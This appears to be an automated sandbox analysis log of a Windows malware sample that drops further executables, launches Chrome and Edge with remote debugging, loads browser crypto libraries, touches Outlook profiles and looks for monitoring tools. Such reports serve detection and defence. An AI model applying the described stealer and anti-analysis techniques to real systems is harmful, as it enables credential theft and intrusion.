Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2084,i,15082746672518523759,5591991654557497421,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2236,i,13354329722629723967,17457331017763836313,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe "C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2272,i,9092242746492624172,9017713632823041127,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 5239808 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe	Static PE information: Raw size of inxiwgrb is bigger than: 0x100000 < 0x2b2800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W;inxiwgrb:EW;mdkdbixl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;inxiwgrb:EW;mdkdbixl:EW;.taggant:EW;
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Unpacked PE file: 16.2.KJJJKFIIIJ.exe.950000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 17.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 18.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: skotes.exe.16.dr	Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: file.exe	Static PE information: real checksum: 0x5006fb should be: 0x5015dd
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: 5762ea743c.exe.20.dr	Static PE information: real checksum: 0x1c9748 should be: 0x1cf875
Source: random[1].exe.20.dr	Static PE information: real checksum: 0x1c9748 should be: 0x1cf875
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: real checksum: 0x321a44 should be: 0x312a79

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: inxiwgrb
Source: file.exe	Static PE information: section name: mdkdbixl
Source: file.exe	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: urdywiyw
Source: random[1].exe.0.dr	Static PE information: section name: pwtoxbng
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name:
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: .idata
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: urdywiyw
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: pwtoxbng
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: skotes.exe.16.dr	Static PE information: section name: urdywiyw
Source: skotes.exe.16.dr	Static PE information: section name: pwtoxbng
Source: skotes.exe.16.dr	Static PE information: section name: .taggant
Source: random[1].exe.20.dr	Static PE information: section name:
Source: random[1].exe.20.dr	Static PE information: section name: .idata
Source: random[1].exe.20.dr	Static PE information: section name:
Source: random[1].exe.20.dr	Static PE information: section name: kgsecyxg
Source: random[1].exe.20.dr	Static PE information: section name: wijvifly
Source: random[1].exe.20.dr	Static PE information: section name: .taggant
Source: 5762ea743c.exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name: .idata
Source: 5762ea743c.exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name: kgsecyxg
Source: 5762ea743c.exe.20.dr	Static PE information: section name: wijvifly
Source: 5762ea743c.exe.20.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0096D91C push ecx; ret	16_2_0096D92F
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00961359 push es; ret	16_2_0096135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A2D91C push ecx; ret	17_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A2D91C push ecx; ret	18_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A2D91C push ecx; ret	20_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A2DFC6 push ecx; ret	20_2_00A2DFD9

Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.008684570285353
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: entropy: 7.008684570285353
Source: skotes.exe.16.dr	Static PE information: section name: entropy: 7.008684570285353
Source: random[1].exe.20.dr	Static PE information: section name: entropy: 7.9861736728364
Source: random[1].exe.20.dr	Static PE information: section name: kgsecyxg entropy: 7.954010447908177
Source: 5762ea743c.exe.20.dr	Static PE information: section name: entropy: 7.9861736728364
Source: 5762ea743c.exe.20.dr	Static PE information: section name: kgsecyxg entropy: 7.954010447908177

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\KJJJKFIIIJ.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\KJJJKFIIIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
